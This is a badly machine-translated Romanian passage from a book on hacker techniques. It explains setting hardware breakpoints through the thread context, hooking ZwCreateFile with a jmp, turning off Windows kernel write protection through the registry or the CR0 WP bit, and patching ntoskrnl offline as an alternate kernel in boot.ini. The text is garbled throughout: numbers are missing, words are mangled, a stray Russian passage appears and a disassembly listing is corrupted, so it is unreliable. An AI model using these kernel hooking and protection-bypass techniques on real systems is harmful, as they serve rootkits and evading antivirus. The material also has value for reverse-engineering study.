ChrisKaspersky „Tehnica și filozofia atacurilor hackerilor” -M : Solon-R, Partea IV Metode avansate de dizassmblingal procesului de proces al procesului cu toate fluxurile sale, a căror analize sunt funcții thead First/ thread Nextcare operează pe principiul cuplului bine cunoscut FindFirstFile/ FindNextFile Primul flux, de regulă, este principalul,deși în unele cazuri nu este așa, dar acestea sunt deja detalii Oricum ar fi, identificatorul fluxului este transmis defuncția OPENTHREAD Aștepta!Ce este OPENTHREAD?Nu există o astfel de funcție!Există un proces deschis, dar OPENTHREAD nueste furnizat în mod constructiv Fiecare programator știe asta!Este suficient să ridicați documentația și săcitiți Ha!Documentație!Hackerii normali o citesc ultima dată (dacă nimic nu ajută, în sfârșit, citiți documentația) șiînainte de aceasta apelează pur și simplu funcțiile la întâmplare sau, în cel mai rău caz, urcă în baza de cunoștințeMSDN, unde se spune fără echivoc că funcția OpenEnthread este încă acolo Este exportat sincer de Kernel dll, darfișierele de antet și de titlu nu sunt activate Notă sub numărul Q („Puncte de reținut atunci când scrieți undebugger pentru Win S”), datând din , despre acest lucru în mod special și vorbește Deci nu este nevoie să văplângeți de apropierea informațiilor Funcția acceptă singurul argument - identificatorul fluxului, iar descriptorul sauzero îl returnează, atunci când încercarea de deschidere se încheie cu eșec (de exemplu, nu există suficiente drepturide acces) Este inacceptabil să se schimbe conținutul contextului din mers (este ca și cum ar traversa autostrada cuviteză mare la lumina roșie), astfel încât fluxul trebuie să fie frânat cu funcția suspendativă înainte deschimbare După aceea, puteți apela GetThreadContext cu steagul contextual full și puteți citi contextul organizat subforma structurii contextuale cu același nume Dificultățile apar din nou aici Platform SDK nu oferă nicio informațiedespre structura contextului, motivând acest lucru prin faptul că nimeni nu trebuie să lucreze cu contextul la un nivelscăzut, este subminat și este implementat pe fiecare platformă în felul său de fapt, Există o singură platformă -Intel și orice altceva este exotic Puteți spune orice și turnați un nivel de abstractizare peste altul, dar nu putețiface acest lucru!Dezvoltatorii Windows au înțeles perfect că niciun program de sistem nu poate face fără să lucreze curegistrele și ne -a oferit un fișier Winnt H minunat, care face parte din SDK -ul platformei și care conține multestructuri subcurente (și structuri de context, inclusiv mai multe) cu mai multe sau mai multe sau comentarii mai puțindetaliate După ce a modificat registrele procesorului la discreția noastră, numim funcția GetThreadContext și abiemfluxul folosind funcția de reluare Toata lumea!Acum, manipulatorul nostru de hackeri restabilește IDT Într -o formăextrem de simplificată, acest lucru se întâmplă, așa cum se arată în lista // obținem un descriptor de flux, //cauzând o funcție subcordată a OPENTHREAD HTHRAD = OPENTHREAD (ID);Ifhread) returnare;// dați un flux de anesteziesuspendat (hThread);// spunem că avem nevoie de un context complet // cu toate registrele de depanareContext ContextFlags = Context full;// extrage contextul intestinelor fluxului GetThreadContext (hThread, context);//Modificați registrele registrelor de filme familiale DRX, // Instalarea punctului hardware de oprire pe codul GPAVhacked Metode moderne de patching // implantați contextul actualizat înapoi la fluxul setthreadContext (hthread,context);// treziți fluxul de reluare (hthread);Minusul uriaș al acestei tehnologii este că este prea vizibil În plus,fluxul poate proteja cu ușurință împotriva GetThreadContext, dar în acest caz există un plan strategic separat înmizeria noastră de hackeri După cum știți, kernel dll conține doar „ambalaje” la nivel înalt (ambalaje) de funcții arireale care duc la următorul „înveliș” din persoana din NTDLL DLL Codul real este concentrat în ntoskrnl exe - un nucleuautentic al sistemului de operare, „trăind” în jumătatea superioară a spațiului de adrese Funcțiile nucleare suntîntotdeauna îndeplinite în contextul cuiva, care în cazul general este contextul procesului care a provocat o anumităfuncție ari Procesele care nu provoacă nicio funcție ARI nu se găsesc în natură Chiar dacă procesul constă în numaioperator de retur (apropo, Windows refuză să încarce fișiere fără import kernel dll), o anumită parte a coduluide încărcare a sistemului este efectuat în contextul procesului încărcat și provoacă multe funcții nucleare Cu altecuvinte, încărcarea procesului fără a deranja nucleele este aproape nerealistă (cu excepția cazului în care îl încărcațipe o mașină virtuală) Aceasta înseamnă că registrele DRX pot Pentru a fi instalat direct din nucleu, fără a contacta GetThreadContext și SetThreadContext Ari-funcție!Este aproapeimposibil să urmăriți aceste fraude!Pentru a îndeplini planul, trebuie să interceptăm una sau mai multe funcțiiviguroase cauzate din contextul procesului atacat chiar înainte ca mecanismul de protecție să primească control (după ceeste prea târziu), funcția ZwCreatefile îndeplinește aceste condiții Nota este adevărată, trebuie menționat că, dacăcodul securizat este situat chiar la începutul aplicației, atunci funcția ZWCreateFile nu ne va ajuta și va trebui să văintegrați în re-fișiere, ceea ce este ceva mai complicat Pentru simplitate, vom lăsa tot particularul dincolo deconversație și ne vom limita la considerarea ZwCreateFile Listarea dezasamblată va arăta aproximativ așa cum se arată înlista Desigur, adresa liniară a funcției din memorie va fi complet diferită, dar este ușor de determinat detabelul de export, deoarece ntoskrnl exe este, de fapt, un fișier executabil obișnuit ■■ Listarea Listareadezasamblată a funcției ZWCreateFile Text: FC ZWCREATEFILE PROC Text: FC Text: FC Text: FC arg = byte PTR Text: FC Text: FC B + MOV TEXT: FC D LEA TEXT: FCC CDI retnaproape;Cod xref: sub d + dvp;Sub bld + VP eax, oh edx, [esp+arg ] eh ch text: fc b zwcreatefileendp text: fbfe; - Codul este destul de tipic pentru funcțiile cu prefixul ZW În primulrând, registrele sunt încărcate, apoi - instrucțiunea int EH, iar în spatele acestuia - Retn XX Antivirusurile suntbine conștiente de acest lucru și, prin urmare, introducerea „stupidă” a echipei JMP a corpului viral va provocaimediat suspiciune Dar substituția echipei Retn XX este mult mai puțin vizibilă Problema este că Retn xx Partea a IV -a Metodele avansate DizAssmit ocupă trei octeți, iar JMP viral to - pânăla cinci!Din fericire, la sfârșitul funcțiilor ZW există aproape întotdeauna o secvență de b FF (mama mamă, EDI, unanalog de doi octeți al NOP) a rămas pentru aliniere Împreună, dau cinci octeți BINE!Salvăm echipa originală Retn XX înșoferul nostru, realizăm un JMP care transferă controlul unui hacker hacker, situat și în șofer Două lucruri trebuie săfie efectuate din acesta - pentru a lua registrele DRX și pentru a restabili comanda Retn XX, transferând imediatcontrolul asupra acesteia Cu alte cuvinte, acoperiți urmele și plecați, fără a uita să stingeți lumina O da!Nu vafuncționa pentru a modifica direct memoria nucleului, deoarece este protejată de modificări Cu toate acestea, aceastăprotecție este ușor de dezactivat Prima metodă Simplu, documentat, dar prea vizibil și pur și simplu unelerat Deschidețiregistrul, găsiți secțiunea HKLM \ System \ CurrentControlset \ Control \ SessionManager \ mejmoryManagejment (Fig ) și creați în acesta tipul de parametru ENforceWriteProtection Reg DWord Toata lumea!Protecția înregistrării estedezactivată!Adevărat, hackerul este oprit și el La urma urmei, oricine poate lansa editorul de registru și poate vedeadacă protecția nucleului este inclusă Într -adevăr, dacă softice sau unele filtre de pachete (tonshiffer de rețea saufirewall) sunt instalate pe computerul care atacă, atunci această cheie există deja și nu sunt necesare eforturisuplimentare pentru noi Dezvoltatorii antivirus își iau capul - încercați să descoperiți dacă această cheie are dreptulsă stea aici sau nu Orez Oprirea protecției nucleului prin registru, cu toate acestea, dacă doriți, nici măcar nuputeți contacta registrul Apărarea este deconectată cu privire la zborul batului de protecție a scrierii (WP) înregistrul CR și, ulterior, a fost restabilită în același mod „în zbor”, astfel încât să pară că nimeni nu ar fi atinsnimic Păzitorii se odihnesc!Întregul cod este pus în mai multe echipe de asamblare, care este mult mai elegant decâtdificil de pronunțat cheile registrului Codul de asamblare pentru blocarea și restabilirea protecției nucleului „On theFly” va fi dat mai departe în acest capitol, cu o discuție detaliată a hack -ului nucleului Windows NT/ /XP (veziLista ) Apropo, modificarea funcțiilor nucleare atunci când lucrați pe mașini multiprocesor conduce episodicsistemul în „ecranul albastru”, ceea ce creează anumite probleme O cale mai corectă, dar și mai vizibilă, calea esteredusă la corectarea tabelului de export și la utilizarea activă a GPAV Metode moderne de plasare „Semafors” Patch -ul nucleului nu este o glumă!Este necesar să aveți experiență cu sisteme multiprocesor simetrice(simetrice multi-procesare, SMP) și cunoașteți o grămadă de lucruri dintr-o varietate de domenii de subiect Dar drumul pleacă, iar cel care aleargă cade!Hack of Windows NT/ /XP nucleu Nucleul sistemului de operare este locul încare viermii, virușii, Rutkin se străduiesc să pătrundă și împreună cu ei - Firewall -uri, trepte de fișiere executabile, protecție împotriva copiilor, antivirusuri și așa mai departe Toți aceștiaconduc o competiție brutală pentru supraviețuire, arătându -se într -un ecran albastru al morții Cum să vă infiltrați înconformitate cu toate regulile și fără conflicte?Structura kernel -ului Windows NT Kernel este formată din douăcomponente cheie: sistemul executiv - sistemul executiv (denumit în continuare kernel), implementat în fișierulntoskrnl exe și nivelul de abstractizare hardware - strat de abstractizare hardware (HAL), Prezentat de Hal Dll De fapt,numele fișierelor pot fi oricare și, în funcție de tipul de nucleu, acestea variază destul de pe scară largă Arhitecturaschematică a nucleului sistemelor de operare din familia Windows NT/ /XP este prezentată în Fig Conceptulinițial de construire a Windows NT intenționa să concentreze întregul cod dependent de sistem în HAL și să-l foloseascăca fundament pentru acoperirea partea IV dependentă de hardware Metode avansate de DizAssMitting a sistemuluiexecutiv Apoi, pentru a transfera nucleul pe noua platformă, ar fi suficient să rescrieți doar HAL, fără a atinge restulcomponentelor (cel puțin teoretic) De fapt, această cerință nu a fost niciodată îndeplinită și un număr mare de coddependent de sistem s -a scurs în sistemul executiv, iar HAL s -a transformat într -o grămadă continuă de funcțiineclasificate strâns întrețesute cu sistemul executiv Astfel, schema cu două niveluri a organizării nucleului arată înprezent destul de condiționat Sistemul executiv Windows NT implementează funcții de gestionare a resurselor principalede nivel ridicat (memorie, fișiere, procese și fluxuri ), într -un anumit sens, fiind sistemul de operare înminiatură Majoritatea acestor funcții sunt slab legate de caracteristicile de proiectare ale echipamentelorspecifice Practic nu se schimbă de la un sistem executiv la altul și sunt la fel de productivi (sau neproductivi) întoate nucleele Partea separată a sistemului executiv, care implementează operațiunile cu nivel mai mic șiinteracționează îndeaproape cu biblioteca abstracțiilor hardware, se numește nucleu (KEGPII) Majoritatea procedurilornucleare sunt destinate utilizării pur interne și nu sunt exportate (deși sunt prezente în caractere datoriei) Aceleașiproceduri care sunt exportate încep de obicei cu prefixele KE (subprograme ale nucleului) sau KI (procesareaîntreruperilor în nucleu) Aceasta este a treia mențiune a nucleului pe care îl întâlnim, ceea ce creează o anumităconfuzie Să încercăm să eficientizăm oarecum acest haos terminologic La nivelul superior al abstracțiilor, miezul estede obicei numit un set de componente ale sistemului de operare care operează într -un inel privilegiat de nivel zero(inelul ) Coborând puțin mai jos, vom vedea că miezul nu este în niciun caz monolit și constă din cel puțin două părți:miezul în sine ca atare și driverele încărcate Nucleul Windows NT este implementat în două fișiere: o bibliotecă deabstracții hardware (de fapt un set de drivere primare) și sistemul executiv Alegerea sistemului executiv este condusăde KEGPII Key Boot ini, atât de mulți îl asociază cu nucleul, deși acest lucru nu este în întregime adevărat Și nu estetotul!Subsistemele de mediu (Win , POSIX, OS/ ) au propriile lor nuclee, concentrate în bibliotecile aplicate aleneauziției celui de -al treilea inel (inelul ) Cu nucleul Windows NT, acestea interacționează printr -un „strat”special implementat în fișierul ntdll dll Nucleele mediului mediului se referă la adaptoare la Windows NT Core și suntaproape complet abstractizați din echipamente Aproape, dar nu chiar!O parte din cod dependentă de sistem este, deasemenea, prezentă aici Versiunile multiprocesor ale fișierelor ntdll dll și kernel dll utilizează comanda de blocarea mașinii pentru a se sincroniza În versiunile monoprocesorului, această echipă își pierde sensul și este înlocuită cu ocomandă NOP mai rapidă Cu siguranță, există și alte diferențe, dar nu ne vom concentra asupra lor, deoarece influențalor asupra performanței sistemului este mică Dintre toată această diversitate, vom interesa în primul rând nucleulsistemului executiv și al HAL Tipurile de nuclee de nucleu sunt determinate atât de caracteristicile arhitecturale aleunei anumite platforme hardware, cât și de preferințele personale ale utilizatorului sistemului, datorită specificuluisarcinilor care trebuie rezolvate Există cel puțin cinci criterii de bază pentru clasificarea nucleelor: □ IntelPentium/Intel Itanium, Compaq SystemPro, Astanhattan) □ Numărul de procesoare (nuclee multiprocesor unice șimultiprocesor) în literatura de specialitate rusă pentru a indica fluxurile (fire) este adesea management folosit" GPAVA Metode moderne de patching □ cantitatea de memorie (înainte GB, peste GB) □ Tipul controlerului de întrerupere (Aris și RIS-ipara) □ Tipul de enumener de rădăcină (ASR și nuAsri-yarara) este evident că miezul ar trebui să fie compatibil cu procesorul țintă la nivelul binarului binar Cod șilucrează în modul cel mai natural pentru el De exemplu, un procesor pe de biți care acceptă arhitectura IA va putealucra cu un nucleu standard pe de biți, dar nu puteți numi o soluție atât de rezonabilă Acest capitol discutăproblemele de evaluare a performanței comparative a nucleelor ​​în cadrul unei platforme hardware, iar subiectulselecției procesorului nu este afectat aici Nucleele multiprocesor diferă de monoprocesor în primul rând prin faptul că„văd” toate procesoarele consacrate și știu să interacționeze cu ei, atribuind această sarcină unui șofer specialîncorporat în HAL În plus, mecanismele de sincronizare sunt procesate radical în ele Dacă în nucleele monoprocesoruluipentru a preveni întreruperea secțiunii critice a codului, este suficient doar pentru a strânge IRQL la nivelul superiorsau a bloca întreruperile cu echipa SP, atunci în nucleul multiprocesor, o astfel de strategie nu mai este declanșată,deoarece toate toate Sunt permise alte procesoare de întrerupere În astfel de cazuri, trebuie să recurgeți la blocare despin Pentru a proteja secțiunea de cod de intervenția exterioară, sistemul ia un steag special, pliați cererile primiteîntr -o linie specială Desigur, acest lucru necesită o anumită cantitate de timp al procesorului, ceea ce afecteazănegativ performanța, dar nu avem altă ieșire Schema de expediere a întreruperilor este, de asemenea, semnificativcomplicată, deoarece acum un set IRQ trebuie împărțit între mai multe procesoare, iar tabelele manipulatorilor deîntrerupere hardware/software sunt acceptate într -o stare coordonată Modificările au afectat, de asemenea,planificatorul, sau mai bine zis, strategia planificării fluxurilor în sine, care poate fi implementată atât într -oschemă simetrică, cât și asimetrică (Fig ) Nucleele simetrice (și majoritatea) permit fiecare flux pe oriceprocesor liber, asimetric - fixați strâns fluxurile de sistem în spatele unuia dintre procesoare, efectuând fluxuri deutilizator pe toate celelalte Nucleele asimetrice ale NS sunt incluși în kitul standard de aprovizionare Windows NT șisunt furnizate de obicei de furnizorii de echipamente adecvate Procesare simetrică Procesare asimetricăFig Procesarea simetrică și asimetrică a descărcării anvelopei de adresă externă a modelelor mai tinere aleprocesoarelor Intel Pentium este de de biți și, prin urmare, nu pot aborda mai mult de GB de memorie fizică De cândpentru Partea a IV -a Metodele avansate de dezasamblare a serverelor serioase și a stațiilor de lucru puternice nuau fost suficiente, începând cu Pentium al RGO, lățimea anvelopei a fost crescută la de biți, ca urmare a căreia amavut ocazia să abordăm până la GB de memorie fizică Când lucrați în pagina obișnuită a abordării paginii, patru bițiseniori ai anvelopei țintă sunt resetate, iar pentru a le utiliza, este necesar să se convertească procesorul înextensiile de adresă fizică), care se caracterizează prin structura redirecționării paginii tabele și susținereapaginilor de memorie de MB Raedara este ceva mai productiv decât nucleele obișnuite, deoarece cele mai vechi MB dinspațiul de adrese al procesului într -o pagină conține, reducând astfel costurile de schimbare a contextului dintreprocese Puteți utiliza Raedara, chiar dacă aveți mai puțin de GB de memorie fizică, dar câștigul în performanță nu vafi foarte semnificativ În funcție de tipul de controler de întrerupere instalat pe placa de bază, ar trebui să alegețifie PIC- sau APIC-YADRO RIS-Controllers susțin IRQ și se găsesc doar pe plăci de bază monoprocesor APIC Controlsacceptă până la IRQ și procesare multiprocesor La nivel de program, controlele RIS-și APIC sunt compatibilereciproc, astfel încât RIS-Yadro ar trebui să funcționeze cu un controler APIC Cu toate acestea, în primul rând, înacelași timp, va vedea doar IRQ și, în al doilea rând, o astfel de configurație nu a fost testată de Microsoft și,prin urmare, nu există garanții că sistemul nu va atârna la încărcare Consiliile materne cu suport pentru tehnologiaASRI pot funcționa atât cu ASRI, cât și cu non-airi-jaaram, în timp ce ASR-Yadra distribuie în mod independent resurselede sistem ale computerului și interacționează direct cu dispozitivele, iar ASR-Yadra se bazează pe Asri-Controller , Defapt, este un enumener rădăcină, adică anvelopa principală a computerului, la care sunt conectate toate celelalteanvelope și dispozitive Și deși această anvelopă este virtuală, performanța sistemului scade semnificativ, deoarececontrolorul Asri tinde să atârne toate dispozitivele PCI pentru o întrerupere cu toate consecințele care urmează Înacest moment, nu vom aprofunda toate aceste detalii, Și concentrați -vă pe miez ca atare prin deschiderea unei cutii negre Înainte de a invada nucleul, să încercăm să ne dămseama de ce este necesar și este posibil să se facă cu un nivel aplicat „democratic” cu care există mult mai puțineconflicte și alte probleme?Viermii, virușii și rootkuts se străduiesc în miez, apoi să ajungă la funcțiile care lucreazăcu memorie, fișiere, conexiuni de rețea și procese la cel mai mic nivel Crearea acestor funcții, puteți deghiza în modfiabil prezența dvs în sistem Tehnici similare sunt utilizate de treptele de fișiere executabile, cum ar fi Themida(fostul protector Extreme), protecția discurilor laser de la copiere (Star-Force, Sony etc ) Tehnica este aceeași ca învirusurile Stealth de acum - ani, doar implementările software sunt diferite Apropo, după un scandal puternic șiproces, Sony a recunoscut -o greșită, retragând peste de articole de discuri protejate Și băieții de la Star-Forcecontinuă să utilizeze metode virale și încă, aruncând în mod regulat sistemele de utilizator în ecranul albastru șirefuzând să lucreze cu noi versiuni de Windows fără a actualiza Star-Force în sine Brandmauers, monitoare de fișiere,antivirusuri și alți paznici interceptează funcțiile nucleare, controlul și oprirea tuturor activitățilorneautorizate De fapt, pentru firewall-uri, sunt prezentate driverul special „mufe” de tip filtru "(un trap filtru) saupseudo-intermediar NDIS (pseudo-prosezhota ndis-drive) Cu toate acestea, toate acestea, datorită standarduluiinterfețelor lor, sunt ușor dezactivate de programele rău intenționate, iar fiabilitatea soluțiilor de acest tip esteextrem de mică În general, această abordare creează doar aspectul protecției, în realitate reprezentând o gaurăcontinuă Este foarte dificil să rezistați interceptării bine performante a funcțiilor nucleare, mai ales dacăinterceptorul rezistă activ la îndepărtarea acestuia În plus, în cele mai recente nuclee Windows au existat multeapărări noi care au complicat viața hackerului Достаточно упомянуть систему активации и связанную с ней ядерную функциюNtLockproductActivationKeys, реализованную в системном вызове h в случае Windows ХР или Ah в случае Windows Server Глава Современные методы патчинга Примечание Переченьсистемных вызовов в разных версиях Windows можно найти на сайте Meta Exploit Project :http://www metasploit com/users/opcode/syscalls html Și versiunile demonstrative ale Windows care funcționează, săzicem, doar de zile?Și semnătura digitală a șoferilor?Apropo, Windows Vista și Longhom oferă schimbări mult mairadicale Niciun cod software nu va putea intra în modul nucleu (chiar și cu drepturile de administrator!), Cu excepțiacazului în care este certificat de o semnătură digitală de la singurul furnizor de cripto -veridisign În același timp,certificatul inițial este de USD, iar certificatele sunt emise numai firmelor înregistrate în StateleUnite Dezvoltatori săraci de șoferi!Virusurile, viermii și alte creaturi vii vor străpunge în continuare un tunel dreptîn miez, deoarece este imposibil să interzicem captarea inelului zero în sistem, conceput inițial fără calcul pentruastfel de interdicții!Prin urmare, dezvoltatorii legali vor trebui fie să stabilească pungi cu dolari pe altarulMicrosoft, fie să utilizeze diferite trucuri de hackeri Ca opțiune, șoferul poate fi semnat cu o semnătură „debug” careface parte din DDK, dar acest lucru este cumva de neconceput În plus, în orice moment, Microsoft poate necesitaîncărcarea unor astfel de drivere numai atunci când apăsați tasta în faza de încărcare În cele din urmă, uneorivreau să îmbunătățesc ușor miezul, de exemplu, schimbând un logo plictisitor de încărcare în ceva Modurile de modificarea interceptării nucleului a funcțiilor sistemice, hacking -ul mecanismelor de protecție, rescrierea logo -ului - toateaceste acțiuni necesită modificarea nucleului concentrat în fișierul ntoskrnl exe Puteți modifica miezul atât pe disc(patch-ul off-line), cât și în memorie (patch on-line) Fiecare metodă are propriile avantaje și dezavantaje, astfelîncât un hacker experimentat trebuie să dețină în egală măsură ambele Modificarea nucleului în memorie este posibilănumai de la driver sau din modul de aplicație prin Pseudo -Devastation \ Device \ PhysicyMemory, care a fost până laWindows Server SP , iar după aceasta a fost închisă chiar și pentru sistemul de tip utilizator (a se vedea nota"Changs to Funcționare în Microso Server Service Pack dispozitiv \ PhysicyMemory Object" по адресprezehttp://www microsoft com/technet/prodtechnol/windowsserver /iibrary/bookofspl/e f a -cfl - a -bea -f dl ce mspx)))) Driverele (și, în plus, programele de aplicații) sunt încărcatedupă nucleu Mai mult, acestea sunt încărcate cu miezul în sine, ceea ce poate refuza chiar să le încarce dacă nu existăsemnătură digitală, sau nucleul nu îi place ceva În plus, orice driver încărcat cu succes poate Închideți încărcarea tuturor celor ulterioare sau împiedicați -le interceptarea funcțiilor sistemice, precum și oricealtă operație pe care au planificat -o În lupta împotriva codului rău intenționat și a paznicilor antivirus, distribuțiaîncărcării devine extrem de relevantă În același timp, niciuna dintre părțile în război nu are o garanție % cășoferul său va fi încărcat mai întâi În plus, dacă principalul raportează la finalizarea liniei de testare sau trimitesistemul să se repornească chiar înainte ca orice drivere să fie la timp pentru încărcare (care a fost practicat înprimele versiuni ale Windows NT), atunci niciun patch on-line nu va ajuta Aici!Apropo, faptul de intervenție în nucleueste ușor detectat printr -o comparație banală a imaginii ntoskrnl exe cu un fișier de disc Disactivarea interceptăriise realizează prin restaurarea octeților „răsfățați” împrumutați de la original Și deși interceptorul care dorește sărămână neobservat, poate și ar trebui să urmărească toate apelurile către ntoskrnl exe - mulți dezvoltatori uită deacest lucru Patch-ul off-line regulează miezul (și, dacă este necesar, alte fișiere) chiar înainte de a fi încărcat înmemorie, ceea ce oferă corecții de acest tip de cea mai mare prioritate Puterile paicherului off-line sunt practicnelimitate și, pentru a modifica nucleul, este necesar doar să avem drepturile administratorului pe o mașinălocală Accesul la fișier nu este blocat, iar schimbările intră în vigoare imediat după repornire, ceea ce este foarteușor de aranjat cu drepturile de administrator, deși nu este întotdeauna convenabil În cazurile în care repornirea esteinadecvată sau nedorită, ei recurg la modificarea nucleului în memorie cu încărcarea dinamică a șoferului Desigur, Partea IV Metode avansate de dizassembing ntoskrnl exe rezistență la SFC, dar această problemă poate fi rezolvată fără aopri chiar SFC (și puțin mai târziu vom arăta cum) Celălalt lucru este mai rău - dacă mai multe programe încep săstăpânească nucleul, atunci un astfel de mishmash formează că sistemul curge în ecranul albastru sau începe să secomporte complet necorespunzător În plus, este necesar să aveți grijă și ca instalarea de noi pachete de actualizare(Service OTS) să nu intre în conflict cu un nucleu hacked În general, există ceva despre care să vorbim aici!Modificareanucleului în memorie, chiar în timp ce în inelul zero, nu poate modifica direct memoria aparținând miezului Cert este cătoți șoferii sunt efectuați într -un singur spațiu vizat, general cu un nucleu Prin urmare, fără protecție împotrivaunei înregistrări neintenționate, sistemul ar suferi constant de șoferi de lucru incorect, concepute cu erori brute Caorice altă protecție împotriva accesului neintenționat, interdicția de modificare a memoriei nucleare poate fioprită Există mai puțin de două moduri documentate de a face acest lucru - static și dinamic Rețineți pe scurt, o metodăstatică de oprirea protecției nucleului de la modificare a fost deja luată în considerare mai devreme în acest capitolîn „Modificare fără modificări de bytes” în care constă în crearea parametrului Registrului EnforceWriteProtection (Data- REG DWORD) în HKLM \ CurrentCont \ Curentrolsels MemoryManagement \ și instalarea valorilor sale în OH (vezi Fig ) după aceea, orice șofer (dar nu un program de aplicație) va putea modifica nucleul dezavantajului principal alacestei metode - potențialul său nesigur, Deoarece părăsirea sistemului de imprimat este o deconectare foartenejustificată a protecției se realizează prin resetarea unui bătăi de securitate de la înregistrarea (WP) în registrulde control CRO În consecință, reinstalarea bitului include din nou protecție Watchmen -urile populare și cunoscute nuurmează aceste fraude, astfel încât pot fi folosiți în toate versiunile Windows Listarea arată codulpseudoraverului, oprind temporar protecția nucleului de la înregistrare, apoi o activează din nou Este numitPseudodorever, deoarece driverele reale (în adevăratul sens al cuvântului) sunt folosiți pentru a gestiona dispozitivereale (sau virtuale) Aveam nevoie de șofer doar pentru a ajunge la inelul zero, așa că folosim singura procedurăDnvertry care practică în etapa de inițializare și returnăm imediat status device configuration error, raportând oeroare fictivă Drept urmare, sistemul va descărca driverul, astfel încât să nu ia memoria în zadar Puteți descărcadriverul fie în mod obișnuit (prin registru), fie prin bootloader -ul dinamic al Sven Schreiber, atașat la cartea sa„Capacitățile nededuse ale Windows ” Bootloader -ul în sine, precum și alte fișiere cu codul sursă, pot fidescărcate de pe site -ul http://www wasm ru sau de pe site -ul web al cărții în sine (http://www rwol com/?topic = ) 'Listarea Cod pseyravere^a kmiwr asm, care oprește temporar protecția nucleului încă se încarcă, dar acest lucru nu este încă așa Listarea L ILR »aakm FileAPHEOZKTATO EH fără apovesti cantitatea de control a Windows nu ar putea porni, deoarece fișierul FollowMG ISMG sau corupt: \System \ NTOSKML EXE Vă rugăm să re-MSTALL și SORA din fișierul de mai sus pentru a recalcula cantitatea de control afișierului de sistem modificat, puteți utiliza utilitatea Editbin, care face parte din platforma SDK și Microsoft VisualStudio Linia de comandă este prezentată în lista Editbm exe /Release FileName exe, în mod natural, nu uitați deprotejarea fișierelor Windows System (SFC), care restabilește automat (sau manual) fișierele modificate Și deși SFC esteușor de liniștit prin simpla oprire sau sincronizare a fișierului de sistem schimbat cu originalul său „de referință”stocat în cache, acest lucru nu va rezolva toate problemele Capitolul Metode moderne de patching La instalareaurmătoarei actualizări care afectează nucleul, instalatorul pur și simplu nu va înțelege ce tip de versiune este aceastași de unde a venit Drept urmare, instalarea va fi întreruptă la mijloc După repornire, sistemul va cădea în ecranulalbastru, iar utilizatorul final va trebui să se angajeze în resuscitarea sa Puteți citi mai multe despre acest lucru peblogul lui Raymond Chen „Old New Thing”- http://blogs msdn com/oldnewthing/archive/ / / / aspx Pentru viruși,o astfel de tehnică poate fi potrivită, dar pentru programele comerciale, este inacceptabil în principiu!Din fericire,există o lacună interesantă - capacitatea de a prescrie un nucleu alternativ în fișierul boot ini, care va fi încărcat,atunci originalul ntoskrnl exe poate fi lăsat în inviolabilitate Nici SFC, nici instalatorul pachetelor de actualizarenu vor fi protestați împotriva acestui lucru, ceea ce este deja bun Dar faptul că actualizarea va afecta nucleuloriginal „pasiv” nu este bun Poate apărea un conflict al vechiului nucleu cu un nou mediu (același lucru se va întâmplala eliminarea pachetului de actualizare), deci este necesar să urmăriți (sau cel puțin manual) schimbarea nucleelor, săcopiați ntoskrnl exe peste nucleu alternativ și re -modificați -l O cale mai degrabă de timp, dar în unele cazuri nuputeți face fără ea, așa că o vom lua în considerare în toate detaliile, mai ales că, în ciuda simplității aparente aoperațiunii, există o mulțime de capcane aici În primul rând, vom copia fișierul ntoskrnl exe (este în folderulSystem ) într -un fișier numit, de exemplu, logoos exe Apoi găsim în catalogul rădăcină al discului de sistem (care, deregulă, este discul cu :) fișierul boot ini și îl deschidem cu orice editor de text adecvat (listarea ) " [BootLoader] Timeout = implicit = multi ( ) disc ( ) rdisk ( ) partiție ( ) \ winxp [sisteme de operare] multi ( ) disc( ) rdisk ( ) partiție (l ) \ Winxp = "Windows XP Professional" /FastDdetect Creează o copie a liniei conținute însecțiunea [Sisteme de operare] și adăugați cheia /kernel = logoos EHE, unde logoos exe este numele nucleului nostrualternativ (listare ) În plus față de ) Aceasta, modificați textul închis în ghilimele adăugând orice textla acesta la discreția dvs (de exemplu, linia hacked) În mod natural, acest lucru se face pentru a simplifica alegereadintre original Core și versiunea sa hacked în procesul de încărcare Listarea ^Ia ^ic^ro ? I File &^pi,Daccenia, posibilitatea de a alege între nuclee și procesul de descărcare* g* [încărcător de pornire]TRMEOUT = DEF Aulti ( Def Aulti ( ) Disk ( ) RDI SK ( ) Ion Partit ( ) \ WinXP [Sisteme de operare] Multi ( ) Disc( ) Rdisk ( ) partiție = "Microsoft Windows XP Professional" /FastDetect Irlti (O) Disk (O) rdisk (o) partitian (l) \winxp = "Microsoft WinDows XP Professional Hacked " /FastDetect /kernel=Logoos exe în timpul procesului de încărcare vaapărea un meniu de boot care vă permite să alegeți între două nuclee alternative (fig ) După ce ne -am asigurat căambele nuclee funcționează corect, mulțumiți, începem să facem hacker Deschideți logoos exe (nucleu alternativ) în Hiewși faceți orice modificări nesemnificative la acesta De exemplu, găsim o secvență de OH OH (NOP/NOP) și o schimbăm la H C H (Xchg Esh, Esh), reținem modificări în și reporniți Imaginile de ecran care afișează conținutul fișieruluilogoos exe înainte și după modificări sunt prezentate în Fig și , respectiv Partea IV Metode avansate de dizassembing Fig Meniul de încărcare care vă permite să alegețiîntre nuclei alternative Conținutul nucleului modificat al OPS!Nucleul alternativ nu se mai încarcă!Ei bine, neîncărcăm de la cea principală, răsplătindu -ne cu diverse epitete neplăcute pentru a uita să numeri suma de control Dămcomanda editbin /lansare IGOOS exe și reporniți din nou Acum, nucleul alternativ funcționează, de parcă nu s -ar fiîntâmplat nimic, iar prima linie a fișierului Bootini (setarea încărcării nucleului original) poate fi eliminată însiguranță, astfel încât meniul de încărcare să nu apară cu fiecare lansare a sistemului Adevărat, în același timp,încărcarea într -un mod sigur va deveni imposibilă, deoarece Windows nu acceptă destul de corect cheia /kernelulsubtecinat și este confuz în nuclee în toate situațiile de urgență În acest caz, sistemul afirmă încăpățânat că fișierulntoskrnl exe nu a fost găsit, deși este prezent în mod regulat Acum să încercăm să răspundem la întrebarea: Cum învațășoferii despre redenumirea nucleului?Tabelul lor de import conține note care indică clar fișierul ntoskrnl exe, care, încazul utilizării unui nucleu alternativ, poate fi complet absent pe disc Cu toate acestea, funcțiile sunt exportate șiimportate și totul funcționează Miracole și numai!GPAVA Metode de patching moderne Start] Chi : RM RFIG La încărcarea nucleului alternativ logoos exe, Softice susține că numele nucleului este ntoskrnifig Echipa de mod Softice clarifică situația Partea a IV -a Metode avansatede dizasseshing, dacă dați comanda TAR în Softice, atunci Softice va afișa numele ntoskrnl (fără expansiune) și nulogoos exe, așa cum vă puteți aștepta, în special luând în considerare faptul că nucleul alternativ conține octețihacked ai H C H (orez (orez ) Ce să crezi?Această întrebare nu este retorică Dacă doriți să comparați imagineanucleului cu un 